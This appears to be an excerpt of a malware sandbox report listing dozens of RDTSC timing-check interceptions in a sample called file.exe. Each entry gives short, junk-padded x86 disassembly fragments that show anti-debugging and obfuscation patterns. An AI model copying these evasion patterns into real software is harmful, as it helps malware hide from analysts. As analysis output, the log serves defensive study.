                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DF84B second address: 6DF86F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F79113F0796h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F79113F07A4h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9381 second address: 6E9395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4EFEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9395 second address: 6E939C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC526 second address: 6EC52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC52A second address: 6EC530 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC530 second address: 6EC540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jo 00007F79111F4EF6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F07F0 second address: 5F07FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F07FB second address: 5F07FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F07FF second address: 5F0803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0803 second address: 5F0826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F79111F4F09h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F8CAB second address: 6F8CAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC1E9 second address: 6FC204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4F07h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC204 second address: 6FC234 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F79113F07A1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F79113F079Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F79113F079Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC0A4 second address: 6FC0A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC0A8 second address: 6FC0B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F79113F0796h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC0B4 second address: 6FC0BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702032 second address: 702037 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700E80 second address: 700E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F79111F4EF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700FF5 second address: 701024 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F79113F079Eh 0x0000000f pushad 0x00000010 popad 0x00000011 ja 00007F79113F0796h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701024 second address: 701041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4F09h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70118E second address: 701194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701719 second address: 70171D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70171D second address: 70174D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F79113F07A0h 0x0000000c jmp 00007F79113F07A8h 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70174D second address: 701753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701753 second address: 701757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701A78 second address: 701A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701A7E second address: 701A8D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F79113F0796h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701D6B second address: 701D70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701D70 second address: 701DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F79113F079Bh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007F79113F07A0h 0x00000014 pop ecx 0x00000015 jmp 00007F79113F079Fh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7067CB second address: 7067DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jl 00007F79111F4EFCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7067DA second address: 7067E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7067E2 second address: 706816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, 73A2E475h 0x0000000d mov dword ptr [ebp+122D3855h], ebx 0x00000013 push 00000004h 0x00000015 sub dword ptr [ebp+1245768Bh], edx 0x0000001b call 00007F79111F4EF9h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jc 00007F79111F4EF6h 0x00000029 jno 00007F79111F4EF6h 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706816 second address: 70682B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79113F07A0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B13 second address: 706B1D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B1D second address: 706B4B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b je 00007F79113F0799h 0x00000011 mov dx, ax 0x00000014 and dh, FFFFFFD4h 0x00000017 push dword ptr [ebp+122D1AFAh] 0x0000001d mov dl, A2h 0x0000001f call 00007F79113F0799h 0x00000024 push esi 0x00000025 pushad 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B4B second address: 706B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 jnp 00007F79111F4EFEh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jmp 00007F79111F4EFDh 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 pop esi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B81 second address: 706B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79113F07A0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B96 second address: 706BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F79111F4EF8h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709E37 second address: 709E3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709E3B second address: 709E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709976 second address: 70997C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70997C second address: 709993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4F03h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709993 second address: 709997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709997 second address: 7099A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7099A0 second address: 7099D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79113F07A5h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jc 00007F79113F07A7h 0x00000013 jmp 00007F79113F07A1h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7099D8 second address: 7099E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F79111F4EF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1197B second address: 4A11996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79113F07A7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11996 second address: 4A119C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bx, 342Eh 0x00000013 push ebx 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A119C0 second address: 4A119C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A119C6 second address: 4A119CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0952 second address: 49B0956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0956 second address: 49B095A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B095A second address: 49B0960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E06A8 second address: 49E06AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E06AC second address: 49E06BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E06BA second address: 49E076B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F79111F4F06h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 mov ebx, 540C1CE2h 0x00000017 mov edx, 36D3252Eh 0x0000001c popad 0x0000001d pushfd 0x0000001e jmp 00007F79111F4EFFh 0x00000023 jmp 00007F79111F4F03h 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, ebp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F79111F4F04h 0x00000032 and si, 8DD8h 0x00000037 jmp 00007F79111F4EFBh 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007F79111F4F08h 0x00000043 adc al, 00000038h 0x00000046 jmp 00007F79111F4EFBh 0x0000004b popfd 0x0000004c popad 0x0000004d mov ebp, esp 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 mov ah, 5Fh 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E076B second address: 49E0793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a push dword ptr [ebp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F79113F07A1h 0x00000015 pop ecx 0x00000016 mov edx, 3A4A8274h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0793 second address: 49E07DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F79111F4F04h 0x0000000b add ax, 1428h 0x00000010 jmp 00007F79111F4EFBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push dword ptr [ebp+0Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F79111F4F05h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0820 second address: 49E0826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0826 second address: 49E06A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0008h 0x0000000b push 00401BF4h 0x00000010 push edi 0x00000011 mov dword ptr [0045F81Ch], eax 0x00000016 call esi 0x00000018 mov edi, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C6B second address: 49C0C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C70 second address: 49C0C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79111F4F00h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C84 second address: 49C0C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C88 second address: 49C0C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C97 second address: 49C0C9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C9D second address: 49C0CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CA3 second address: 49C0CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CA7 second address: 49C0CC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F79111F4F05h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CC9 second address: 49C0DBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79113F07A7h 0x00000008 pushfd 0x00000009 jmp 00007F79113F07A8h 0x0000000e xor esi, 380A6F38h 0x00000014 jmp 00007F79113F079Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F79113F07A4h 0x00000026 sub si, E998h 0x0000002b jmp 00007F79113F079Bh 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007F79113F07A8h 0x00000037 sbb esi, 68DE13F8h 0x0000003d jmp 00007F79113F079Bh 0x00000042 popfd 0x00000043 popad 0x00000044 pop ebp 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 pushfd 0x00000049 jmp 00007F79113F079Bh 0x0000004e adc ecx, 01967FBEh 0x00000054 jmp 00007F79113F07A9h 0x00000059 popfd 0x0000005a pushfd 0x0000005b jmp 00007F79113F07A0h 0x00000060 xor ecx, 684478B8h 0x00000066 jmp 00007F79113F079Bh 0x0000006b popfd 0x0000006c popad 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0DBA second address: 4A11660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov bh, 1Ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp dword ptr [74E51560h] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push esi 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a push edi 0x0000001b mov edi, dword ptr fs:[00000018h] 0x00000022 cmp esi, 40h 0x00000025 jnc 00007F79111F4F07h 0x00000027 mov eax, dword ptr [ebp+0Ch] 0x0000002a mov dword ptr [edi+esi*4+00000E10h], eax 0x00000031 mov eax, 00000001h 0x00000036 pop edi 0x00000037 pop esi 0x00000038 pop ebp 0x00000039 retn 0008h 0x0000003c test eax, eax 0x0000003e je 00007F79111F4FB1h 0x00000044 call 00007F79111F3421h 0x00000049 mov edi, edi 0x0000004b push esi 0x0000004c call 00007F79111F6551h 0x00000051 push 00000000h 0x00000053 call 00007F79111F4E7Ch 0x00000058 mov edi, edi 0x0000005a push ebp 0x0000005b mov ebp, esp 0x0000005d push esi 0x0000005e push dword ptr [00459714h] 0x00000064 mov esi, dword ptr [00401128h] 0x0000006a call esi 0x0000006c mov edi, edi 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F79111F4F03h 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11660 second address: 4A116A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F79113F079Fh 0x00000008 pop ecx 0x00000009 call 00007F79113F07A9h 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F79113F07A3h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A116A6 second address: 4A116C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov eax, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F79111F4EFFh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A116C7 second address: 4A116CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A116CB second address: 4A116D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0776 second address: 49A077C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A077C second address: 49A0780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0780 second address: 49A079A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d mov di, 9FB6h 0x00000011 popad 0x00000012 mov ecx, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A079A second address: 49A07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 9BCBh 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A07A3 second address: 49A07EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F79113F07A8h 0x00000014 and ax, CD38h 0x00000019 jmp 00007F79113F079Bh 0x0000001e popfd 0x0000001f mov dx, si 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A07EB second address: 49A0810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, E5h 0x00000005 mov ecx, 1DCAE103h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d inc eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F79111F4F05h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0810 second address: 49A084E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov bx, 485Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lock xadd dword ptr [ecx], eax 0x00000010 jmp 00007F79113F07A5h 0x00000015 inc eax 0x00000016 jmp 00007F79113F079Eh 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ax, di 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A084E second address: 49A0854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0854 second address: 49A0858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A100F5 second address: 4A1013C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F79111F4F01h 0x00000009 sub esi, 0BD63026h 0x0000000f jmp 00007F79111F4F01h 0x00000014 popfd 0x00000015 jmp 00007F79111F4F00h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
